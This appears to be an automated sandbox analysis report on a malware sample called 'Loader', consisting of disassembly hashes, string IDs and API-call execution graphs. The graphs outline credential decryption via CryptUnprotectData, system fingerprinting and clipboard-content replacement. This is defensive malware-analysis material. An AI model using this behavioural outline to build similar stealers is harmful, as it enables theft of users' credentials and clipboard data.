                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0032F7C9,?,?,?,00000055,?,-00000050,?,?,?), ref: 0033A1A5
                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0032F7C9,?,?,?,00000055,?,-00000050,?,?), ref: 0033A1DC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                          • String ID: utf8
                                                                                          • API String ID: 943130320-905460609
                                                                                          • Opcode ID: daa0830750f91c54220bbcccbacb9530005f8e8e94aaf0694d129d90651c7c02
                                                                                          • Instruction ID: 6db3ef582a07c4584440792b9f5a19ca3c0ed278efdef9bfeaf7f297bb0e109b
                                                                                          • Opcode Fuzzy Hash: daa0830750f91c54220bbcccbacb9530005f8e8e94aaf0694d129d90651c7c02
                                                                                          • Instruction Fuzzy Hash: D5510231A00F05AAEB27AB748CC2BA773ACEF05700F154929F995DF481EA75E9409762
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00335031,?,?,00000000,00000000,00000000,?), ref: 00335155
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: 56e6c73aa456c2549dd7c6d9ab4f5b3d389e9e3b036016a5d641a703e9359789
                                                                                          • Instruction ID: 8e27633386fecd2cf4d21b651b546f2c16142312321fd9d9e71b187408ddf24b
                                                                                          • Opcode Fuzzy Hash: 56e6c73aa456c2549dd7c6d9ab4f5b3d389e9e3b036016a5d641a703e9359789
                                                                                          • Instruction Fuzzy Hash: AF414871900609EFCF16DF94CC81AEEBBB5BF48300F154559FA09AB211D335AA91DB91
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00334C13
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3493665558-3733052814
                                                                                          • Opcode ID: ac364b2fd964fa419b0410a51da2b29e4e9df203ca4d655c5a508d296b9d6ef7
                                                                                          • Instruction ID: 60df33fe794c6db1506547c589996e5f622e706403e908ef1704cb64c1400e25
                                                                                          • Opcode Fuzzy Hash: ac364b2fd964fa419b0410a51da2b29e4e9df203ca4d655c5a508d296b9d6ef7
                                                                                          • Instruction Fuzzy Hash: 2D31F376401218AFCF239F50CCC496E7B65FF09315F1A825AF8544A122C336ECA1DB91
                                                                                          APIs
                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 003267DB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___std_exception_copy
                                                                                          • String ID: Ey2$.2
                                                                                          • API String ID: 2659868963-2198933547
                                                                                          • Opcode ID: dd81561db35c2d1beeedda9f72aeb5e53e8e9be7e4f1412378423c4bd41dd903
                                                                                          • Instruction ID: 5102c17fe214798e4d00c35e856396111ebf511ba5f8bcb259a75da6726ade49
                                                                                          • Opcode Fuzzy Hash: dd81561db35c2d1beeedda9f72aeb5e53e8e9be7e4f1412378423c4bd41dd903
                                                                                          • Instruction Fuzzy Hash: 7A01ACB49043089FDB05DF98D5956AEBBF0FF58304F10846DE459AB341DB34AA44CF96

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.6%
                                                                                          Dynamic/Decrypted Code Coverage:4.6%
                                                                                          Signature Coverage:48.6%
                                                                                          Total number of Nodes:370
                                                                                          Total number of Limit Nodes:33
                                                                                          execution_graph 31553 42f100 CoSetProxyBlanket 31554 40cec7 31555 40cef0 31554->31555 31558 439b30 31555->31558 31557 40d01a 31557->31557 31559 439b60 CoCreateInstance 31558->31559 31561 439cfb SysAllocString 31559->31561 31562 43a1f9 31559->31562 31565 439d6f 31561->31565 31563 43a209 GetVolumeInformationW 31562->31563 31568 43a220 31563->31568 31566 43a1e5 SysFreeString 31565->31566 31567 439d7e CoSetProxyBlanket 31565->31567 31566->31562 31569 43a1db 31567->31569 31570 439d9e SysAllocString 31567->31570 31568->31557 31569->31566 31572 439e80 31570->31572 31572->31572 31573 439e96 SysAllocString 31572->31573 31576 439ebc 31573->31576 31574 43a1bf SysFreeString SysFreeString 31574->31569 31575 43a1b5 31575->31574 31576->31574 31576->31575 31577 439f00 VariantInit 31576->31577 31579 439f50 31577->31579 31578 43a1a4 VariantClear 31578->31575 31579->31578 31580 40d54c 31581 40d560 31580->31581 31585 40d5b8 31581->31585 31697 43eec0 LdrInitializeThunk 31581->31697 31582 40d63e 31602 422f70 31582->31602 31585->31582 31698 43eec0 LdrInitializeThunk 31585->31698 31587 40d67d 31618 4237c0 31587->31618 31589 40d69d 31631 423ae0 31589->31631 31591 40d6bd 31644 4262a0 31591->31644 31593 40d6dd 31659 426b80 31593->31659 31597 40d6ef 31673 429df0 31597->31673 31599 40d6f8 31699 434280 6 API calls 31599->31699 31601 40d741 31603 422fd0 31602->31603 31603->31603 31604 42300d RtlExpandEnvironmentStrings 31603->31604 31607 423060 31604->31607 31605 423109 31605->31587 31606 423507 31617 42362c 31606->31617 31704 420dd0 31606->31704 31607->31605 31608 4230e3 RtlExpandEnvironmentStrings 31607->31608 31611 423127 31607->31611 31613 423376 31607->31613 31614 423241 31607->31614 31608->31605 31608->31611 31608->31613 31608->31614 31610 4234f1 GetLogicalDrives 31615 441f50 LdrInitializeThunk 31610->31615 31611->31611 31612 441f50 LdrInitializeThunk 31611->31612 31612->31614 31613->31606 31613->31610 31613->31613 31613->31617 31614->31614 31700 441f50 31614->31700 31615->31606 31619 423860 31618->31619 31619->31619 31620 4238cc RtlExpandEnvironmentStrings 31619->31620 31622 423920 31620->31622 31623 4239d2 31622->31623 31624 423c93 31622->31624 31627 4239b1 RtlExpandEnvironmentStrings 31622->31627 31628 423a9f 31622->31628 31730 4412b0 RtlFreeHeap LdrInitializeThunk 31622->31730 31729 41ead0 RtlFreeHeap LdrInitializeThunk 31623->31729 31731 440fd0 31624->31731 31627->31622 31627->31623 31627->31624 31627->31628 31628->31589 31632 423aee 31631->31632 31633 440ed0 LdrInitializeThunk 31632->31633 31634 423992 31633->31634 31635 423c93 31634->31635 31637 4239d2 31634->31637 31638 423a9f 31634->31638 31642 4239b1 RtlExpandEnvironmentStrings 31634->31642 31747 4412b0 RtlFreeHeap LdrInitializeThunk 31634->31747 31639 440fd0 2 API calls 31635->31639 31746 41ead0 RtlFreeHeap LdrInitializeThunk 31637->31746 31638->31591 31641 423cc7 31639->31641 31641->31638 31643 440ed0 LdrInitializeThunk 31641->31643 31642->31634 31642->31635 31642->31637 31642->31638 31643->31638 31645 4264ed 31644->31645 31646 4264ce 31644->31646 31648 4262cc 31644->31648 31652 426510 31644->31652 31653 4264fc 31644->31653 31645->31652 31645->31653 31657 4266f2 31645->31657 31748 43ee40 31645->31748 31763 4412b0 RtlFreeHeap LdrInitializeThunk 31646->31763 31648->31645 31648->31646 31648->31648 31650 440ed0 LdrInitializeThunk 31648->31650 31648->31652 31648->31653 31648->31657 31650->31648 31651 440ed0 LdrInitializeThunk 31651->31653 31652->31593 31652->31652 31653->31651 31653->31652 31656 440fd0 2 API calls 31653->31656 31653->31657 31755 441900 31653->31755 31765 43eec0 LdrInitializeThunk 31653->31765 31656->31653 31657->31652 31764 43eec0 LdrInitializeThunk 31657->31764 31660 426bb0 31659->31660 31663 426c1e 31660->31663 31768 43eec0 LdrInitializeThunk 31660->31768 31661 40d6e6 31667 427030 31661->31667 31663->31661 31666 426d0e 31663->31666 31769 43eec0 LdrInitializeThunk 31663->31769 31664 43d010 RtlFreeHeap 31664->31661 31666->31664 31770 427050 RtlFreeHeap LdrInitializeThunk 31667->31770 31669 427044 31669->31597 31670 427039 31670->31669 31670->31670 31771 43aae0 RtlFreeHeap LdrInitializeThunk 31670->31771 31672 42781d 31672->31597 31674 429e80 31673->31674 31674->31674 31675 429f35 RtlExpandEnvironmentStrings 31674->31675 31683 429f80 31675->31683 31676 42a32e 31686 42a642 31676->31686 31688 42a376 31676->31688 31696 42a008 31676->31696 31779 4420d0 LdrInitializeThunk 31676->31779 31677 42a02f 31681 441dd0 LdrInitializeThunk 31677->31681 31678 42a043 31678->31676 31679 42a06a 31678->31679 31690 42a0a3 31678->31690 31678->31696 31772 4420d0 LdrInitializeThunk 31678->31772 31679->31676 31679->31690 31679->31696 31773 442190 31679->31773 31681->31678 31683->31676 31683->31677 31683->31678 31683->31679 31687 429fe9 RtlExpandEnvironmentStrings 31683->31687 31683->31690 31683->31696 31684 42a355 31684->31686 31684->31688 31684->31696 31780 43eec0 LdrInitializeThunk 31686->31780 31687->31676 31687->31677 31687->31678 31687->31679 31687->31690 31687->31696 31689 442190 LdrInitializeThunk 31688->31689 31689->31688 31690->31676 31690->31686 31690->31688 31691 42a6eb 31690->31691 31692 441dd0 LdrInitializeThunk 31690->31692 31690->31696 31781 43eec0 LdrInitializeThunk 31691->31781 31692->31676 31695 42a708 31696->31599 31697->31585 31698->31582 31699->31601 31701 441f70 31700->31701 31702 44207e 31701->31702 31716 43eec0 LdrInitializeThunk 31701->31716 31702->31614 31717 441dd0 31704->31717 31706 42150b 31706->31617 31708 420fae 31710 43d010 RtlFreeHeap 31708->31710 31709 420e1a 31709->31706 31713 420ecf 31709->31713 31721 43eec0 LdrInitializeThunk 31709->31721 31711 4214a6 31710->31711 31711->31706 31727 43eec0 LdrInitializeThunk 31711->31727 31713->31708 31722 43eec0 LdrInitializeThunk 31713->31722 31723 43d010 31713->31723 31716->31702 31718 441df0 31717->31718 31719 441efe 31718->31719 31728 43eec0 LdrInitializeThunk 31718->31728 31719->31709 31721->31709 31722->31713 31724 43d023 31723->31724 31725 43d025 31723->31725 31726 43d03b RtlFreeHeap 31723->31726 31724->31713 31725->31726 31726->31713 31727->31711 31728->31719 31729->31628 31730->31622 31732 440ff0 31731->31732 31734 441048 31732->31734 31743 43eec0 LdrInitializeThunk 31732->31743 31737 423cc7 31734->31737 31738 44115f 31734->31738 31744 43eec0 LdrInitializeThunk 31734->31744 31735 43d010 RtlFreeHeap 31735->31737 31737->31628 31739 440ed0 31737->31739 31738->31735 31740 440ef0 31739->31740 31741 440f9f 31740->31741 31745 43eec0 LdrInitializeThunk 31740->31745 31741->31628 31743->31734 31744->31738 31745->31741 31746->31638 31747->31634 31749 43ee93 31748->31749 31750 43ee88 31748->31750 31751 43ee60 31748->31751 31752 43ee74 31748->31752 31753 43d010 RtlFreeHeap 31749->31753 31750->31653 31751->31749 31751->31750 31751->31752 31754 43ee79 RtlReAllocateHeap 31752->31754 31753->31750 31754->31750 31756 44190f 31755->31756 31759 441a2e 31756->31759 31766 43eec0 LdrInitializeThunk 31756->31766 31757 441c0f 31757->31653 31759->31757 31762 441b4e 31759->31762 31767 43eec0 LdrInitializeThunk 31759->31767 31760 43d010 RtlFreeHeap 31760->31757 31762->31760 31763->31645 31764->31652 31765->31653 31766->31759 31767->31762 31768->31663 31769->31666 31770->31670 31771->31672 31772->31679 31774 4421b0 31773->31774 31777 4421fe 31774->31777 31782 43eec0 LdrInitializeThunk 31774->31782 31775 44229e 31775->31690 31777->31775 31783 43eec0 LdrInitializeThunk 31777->31783 31779->31684 31780->31691 31781->31695 31782->31777 31783->31775 31784 43d050 31785 43d080 31784->31785 31788 43d0fe 31785->31788 31792 43eec0 LdrInitializeThunk 31785->31792 31786 43d301 31788->31786 31791 43d20e 31788->31791 31793 43eec0 LdrInitializeThunk 31788->31793 31789 43d010 RtlFreeHeap 31789->31786 31791->31789 31792->31788 31793->31791 31794 40ffd6 31795 40fff0 31794->31795 31796 410333 RtlExpandEnvironmentStrings 31795->31796 31799 40e4da 31795->31799 31798 4103a6 31796->31798 31798->31799 31800 414930 31798->31800 31801 414950 31800->31801 31801->31801 31802 441dd0 LdrInitializeThunk 31801->31802 31803 414a81 31802->31803 31804 414a90 31803->31804 31806 4420d0 LdrInitializeThunk 31803->31806 31804->31799 31806->31803 31807 43f0d4 31809 43f0de 31807->31809 31808 43f1ce 31809->31808 31811 43eec0 LdrInitializeThunk 31809->31811 31811->31808 31812 42d41a 31813 42d426 GetComputerNameExA 31812->31813 31815 40d75b 31820 434460 31815->31820 31817 40d761 31818 40d770 CoUninitialize 31817->31818 31819 40d790 31818->31819 31821 434495 GetSystemMetrics GetSystemMetrics 31820->31821 31822 4344d8 31821->31822 31823 414a9a 31825 414a9f 31823->31825 31824 441dd0 LdrInitializeThunk 31826 414c4d 31824->31826 31825->31824 31825->31825 31827 414c97 31826->31827 31829 414cd5 31826->31829 31841 414c5c 31826->31841 31853 4420d0 LdrInitializeThunk 31826->31853 31827->31829 31830 442190 LdrInitializeThunk 31827->31830 31832 4150c3 31829->31832 31840 415099 CryptUnprotectData 31829->31840 31854 43eec0 LdrInitializeThunk 31829->31854 31830->31829 31833 415351 31832->31833 31836 4151bb 31832->31836 31850 41536b 31832->31850 31856 4191c0 FreeLibrary FreeLibrary RtlFreeHeap LdrInitializeThunk 31833->31856 31835 415356 31843 4156aa 31835->31843 31835->31850 31837 415288 31836->31837 31838 4155ab 31836->31838 31836->31841 31836->31850 31855 41bdd0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 31837->31855 31857 41bdd0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 31838->31857 31840->31829 31840->31832 31852 415782 31843->31852 31858 43eec0 LdrInitializeThunk 31843->31858 31844 415bcd 31849 415f76 31844->31849 31860 43eec0 LdrInitializeThunk 31844->31860 31847 4166ff 31849->31849 31850->31838 31850->31841 31851 441f50 LdrInitializeThunk 31850->31851 31851->31850 31852->31844 31852->31849 31859 43eec0 LdrInitializeThunk 31852->31859 31853->31827 31854->31829 31855->31841 31856->31835 31857->31841 31858->31852 31859->31844 31860->31847 31861 436c9e 31862 436cce 31861->31862 31864 436d12 31862->31864 31865 43eec0 LdrInitializeThunk 31862->31865 31865->31862 31866 40d49d 31868 40d4b0 31866->31868 31867 40d4f3 31868->31867 31870 43eec0 LdrInitializeThunk 31868->31870 31870->31867 31871 43f5dd 31872 43f600 31871->31872 31873 43f682 31872->31873 31878 43eec0 LdrInitializeThunk 31872->31878 31877 43eec0 LdrInitializeThunk 31873->31877 31876 43f901 31877->31876 31878->31873 31879 42da21 31880 42da50 31879->31880 31880->31880 31881 42df17 GetPhysicallyInstalledSystemMemory 31880->31881 31882 42df40 31881->31882 31882->31882 31883 43faeb GetForegroundWindow 31887 440e80 31883->31887 31885 43faf9 GetForegroundWindow 31886 43fb0a 31885->31886 31888 440e90 31887->31888 31888->31885 31889 52a1000 31890 52a1102 31889->31890 31891 52a1012 31889->31891 31892 52a103a OpenClipboard 31891->31892 31893 52a1030 Sleep 31891->31893 31894 52a104a GetClipboardData 31892->31894 31895 52a10f9 GetClipboardSequenceNumber 31892->31895 31893->31891 31896 52a105a GlobalLock 31894->31896 31897 52a10f3 CloseClipboard 31894->31897 31895->31891 31896->31897 31898 52a106b 31896->31898 31897->31895 31898->31898 31899 52a108d GlobalAlloc 31898->31899 31900 52a10e9 GlobalUnlock 31899->31900 31901 52a109d GlobalLock 31899->31901 31900->31897 31902 52a10b0 31901->31902 31903 52a10b9 GlobalUnlock 31902->31903 31904 52a10cb EmptyClipboard SetClipboardData 31903->31904 31905 52a10e0 GlobalFree 31903->31905 31904->31900 31904->31905 31905->31900 31907 42bf2d 31908 42bf38 31907->31908 31912 439800 31908->31912 31910 42bf46 31911 439800 LdrInitializeThunk 31910->31911 31911->31910 31913 439825 31912->31913 31916 4398ed 31913->31916 31921 43eec0 LdrInitializeThunk 31913->31921 31914 439ac9 31914->31910 31916->31914 31918 4399cf 31916->31918 31920 43eec0 LdrInitializeThunk 31916->31920 31918->31914 31922 43eec0 LdrInitializeThunk 31918->31922 31920->31916 31921->31913 31922->31918 31923 4087b0 31925 4087bf 31923->31925 31924 408a4f ExitProcess 31925->31924 31926 4087d4 GetCurrentProcessId GetCurrentThreadId 31925->31926 31927 408a41 31925->31927 31929 4087fa 31926->31929 31930 4087fe SHGetSpecialFolderPathW 31926->31930 31939 43ee20 FreeLibrary 31927->31939 31929->31930 31931 408930 31930->31931 31932 4089b6 GetForegroundWindow 31931->31932 31934 4089cb 31932->31934 31933 408a38 31933->31927 31934->31933 31938 40c880 CoInitializeEx 31934->31938 31939->31924 31940 4206f0 31941 420704 31940->31941 31945 420811 31940->31945 31946 420830 31941->31946 31947 420840 31946->31947 31948 441f50 LdrInitializeThunk 31947->31948 31949 42094f 31948->31949 31950 43cff0 31953 440630 31950->31953 31954 43cff5 RtlAllocateHeap 31953->31954 31955 40c8b3 CoInitializeSecurity 31956 438974 31957 438979 31956->31957 31958 4389a4 GetUserDefaultUILanguage 31957->31958 31959 4389d3 31958->31959 31960 42c87a 31961 42c8b0 31960->31961 31961->31961 31962 42c98e 31961->31962 31964 43eec0 LdrInitializeThunk 31961->31964 31964->31962 31965 40dd7a 31966 40dd82 31965->31966 31969 411920 31966->31969 31968 40dd8f 31980 411939 31969->31980 31970 411940 31970->31968 31971 411ec3 RtlExpandEnvironmentStrings 31971->31980 31972 4133c1 CreateThread 31972->31980 31973 412198 RtlExpandEnvironmentStrings 31973->31980 31974 411fb4 RtlExpandEnvironmentStrings 31974->31980 31975 41237d RtlExpandEnvironmentStrings 31975->31980 31978 43eec0 LdrInitializeThunk 31978->31980 31979 43d010 RtlFreeHeap 31979->31980 31980->31970 31980->31971 31980->31972 31980->31973 31980->31974 31980->31975 31980->31978 31980->31979 31981 441c20 LdrInitializeThunk 31980->31981 31982 4422f0 LdrInitializeThunk 31980->31982 31981->31980 31982->31980 31983 43f23f 31984 43f260 31983->31984 31984->31984 31985 43f2ce 31984->31985 31987 43eec0 LdrInitializeThunk 31984->31987 31987->31985 31996 42d2ff 31997 42d313 31996->31997 31998 42d37b GetComputerNameExA 31997->31998 31999 42207d 32000 422094 31999->32000 32011 422167 31999->32011 32003 422162 32000->32003 32022 43eec0 LdrInitializeThunk 32000->32022 32002 4226eb 32006 422e34 32002->32006 32010 4228bf 32002->32010 32002->32011 32014 423127 32002->32014 32025 43eec0 LdrInitializeThunk 32002->32025 32003->32002 32004 422e0f 32003->32004 32003->32011 32024 43eec0 LdrInitializeThunk 32004->32024 32008 4230e3 RtlExpandEnvironmentStrings 32006->32008 32008->32011 32008->32014 32018 423241 32008->32018 32019 423376 32008->32019 32009 423507 32013 420dd0 2 API calls 32009->32013 32021 42362c 32009->32021 32010->32011 32023 43eec0 LdrInitializeThunk 32010->32023 32013->32021 32014->32014 32015 441f50 LdrInitializeThunk 32014->32015 32015->32018 32016 4234f1 GetLogicalDrives 32020 441f50 LdrInitializeThunk 32016->32020 32017 441f50 LdrInitializeThunk 32017->32018 32018->32017 32018->32018 32019->32009 32019->32016 32019->32019 32019->32021 32020->32009 32022->32003 32023->32011 32024->32006 32025->32002
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $"$#$$$%$&$&$'$($)$*$*$,$-$/$0$1$3$4$6$8$9$9$<$=$>$A$B$C$D$D$D$E$G$H$K$M$N$O$S$X$Y$Z$[$_$`$f$p$r$t$u$v$x$|
                                                                                          • API String ID: 0-842215263
                                                                                          • Opcode ID: e1db05eb6b877458662798f7b77d9f674f87e06c784e635f8a94fdc96650a68d
                                                                                          • Instruction ID: 919045ca250a3dc522ea085bcacde565848991d1b776b7806181371f3fd81d75
                                                                                          • Opcode Fuzzy Hash: e1db05eb6b877458662798f7b77d9f674f87e06c784e635f8a94fdc96650a68d
                                                                                          • Instruction Fuzzy Hash: C203BD3150C7C18AC3359B3885443DFBFE1AB96324F188A6EE4E9873D2D6788586C75B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 50;>$>89>$KiY]$Ovxu$U^nl$V$[W:($bYbU$rpLA$wOGH$|W:($L4$L4
                                                                                          • API String ID: 0-291379916
                                                                                          • Opcode ID: 708b374310dfa8033e766b2e8d36929ad886bd4ce37cf35e25c25107b4ef0a77
                                                                                          • Instruction ID: 65dbaec70bbc84fecd4f702046f7613bdab94853883533c89d79ffcbef30d949
                                                                                          • Opcode Fuzzy Hash: 708b374310dfa8033e766b2e8d36929ad886bd4ce37cf35e25c25107b4ef0a77
                                                                                          • Instruction Fuzzy Hash: DDA24976A083518BD724CF25D8917EFB7E2EBC5314F08893EE49987392E7389845C786

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 758 439b30-439b5f 759 439b60-439ba2 758->759 759->759 760 439ba4-439bb2 759->760 761 439bc0-439bd2 760->761 761->761 762 439bd4-439c12 761->762 763 439c20-439c32 762->763 763->763 764 439c34-439c50 763->764 766 439c52 764->766 767 439c5d-439c66 764->767 766->767 768 439c70-439c99 767->768 768->768 769 439c9b-439cf5 CoCreateInstance 768->769 770 439cfb-439d2f 769->770 771 43a1f9-43a21e call 4409b0 GetVolumeInformationW 769->771 773 439d30-439d44 770->773 776 43a220-43a224 771->776 777 43a228-43a22a 771->777 773->773 775 439d46-439d78 SysAllocString 773->775 780 43a1e5-43a1f5 SysFreeString 775->780 781 439d7e-439d98 CoSetProxyBlanket 775->781 776->777 779 43a23c-43a247 777->779 782 43a260-43a27f 779->782 783 43a249-43a250 779->783 780->771 785 43a1db-43a1e1 781->785 786 439d9e-439db3 781->786 784 43a280-43a2da 782->784 783->782 787 43a252-43a25e 783->787 784->784 788 43a2dc-43a2f5 784->788 785->780 789 439dc0-439e05 786->789 787->782 790 43a300-43a325 788->790 789->789 791 439e07-439e7f SysAllocString 789->791 790->790 792 43a327-43a343 790->792 793 439e80-439e94 791->793 794 43a3b0-43a3b7 792->794 795 43a345-43a351 792->795 793->793 796 439e96-439ebe SysAllocString 793->796 799 43a3f7-43a3ff 794->799 797 43a353-43a355 795->797 798 43a3c0-43a3c5 795->798 806 439ec4-439ee6 796->806 807 43a1bf-43a1d4 SysFreeString * 2 796->807 800 43a360-43a399 797->800 802 43a3a0-43a3ab 798->802 803 43a3c7-43a3ec 798->803 804 43a400-43a408 799->804 800->800 805 43a39b-43a39e 800->805 808 43a3ef-43a3f3 802->808 803->808 804->804 809 43a40a-43a40c 804->809 805->802 805->803 816 43a1b5-43a1bb 806->816 817 439eec-439eef 806->817 807->785 808->799 810 43a412-43a422 call 408150 809->810 811 43a230-43a236 809->811 810->811 811->779 814 43a427-43a42e 811->814 816->807 817->816 818 439ef5-439efa 817->818 818->816 819 439f00-439f48 VariantInit 818->819 820 439f50-439f64 819->820 820->820 821 439f66-439f70 820->821 822 439f74-439f76 821->822 823 43a1a4-43a1b1 VariantClear 822->823 824 439f7c-439f82 822->824 823->816 824->823 825 439f88-439f92 824->825 826 439fd5 825->826 827 439f94-439f99 825->827 829 439fd7-439ff1 call 407fc0 826->829 828 439fac-439fb0 827->828 830 439fb2-439fbb 828->830 831 439fa0 828->831 837 43a152-43a163 829->837 838 439ff7-43a001 829->838 835 439fc2-439fc6 830->835 836 439fbd-439fc0 830->836 834 439fa1-439faa 831->834 834->828 834->829 835->834 839 439fc8-439fd3 835->839 836->834 841 43a165 837->841 842 43a16a-43a176 837->842 838->837 840 43a007-43a00f 838->840 839->834 843 43a010-43a01e 840->843 841->842 844 43a178 842->844 845 43a17d-43a1a0 call 407ff0 call 407fd0 842->845 846 43a040-43a046 843->846 847 43a020-43a02d 843->847 844->845 845->823 850 43a074-43a080 846->850 851 43a048-43a04b 846->851 849 43a0f0-43a0f4 847->849 857 43a0f6-43a0fc 849->857 854 43a086-43a089 850->854 855 43a108-43a110 850->855 851->850 853 43a04d-43a072 851->853 853->849 854->855 860 43a08b-43a0ef 854->860 858 43a112-43a118 855->858 859 43a11a-43a11f 855->859 857->837 862 43a0fe-43a100 857->862 858->857 863 43a121-43a148 859->863 864 43a14a-43a150 859->864 860->849 862->843 865 43a106 862->865 863->849 864->849 865->837
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0044468C,00000000,00000001,0044467C,00000000), ref: 00439CED
                                                                                          • SysAllocString.OLEAUT32(CCA0CE8C), ref: 00439D47
                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439D90
                                                                                          • SysAllocString.OLEAUT32(82DC8CE4), ref: 00439E0C
                                                                                          • SysAllocString.OLEAUT32(82DC8CE4), ref: 00439E97
                                                                                          • VariantInit.OLEAUT32(oTUJ), ref: 00439F05
                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,CCA0CE8C,00000000,00000000,00000000,00000000), ref: 0043A21A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
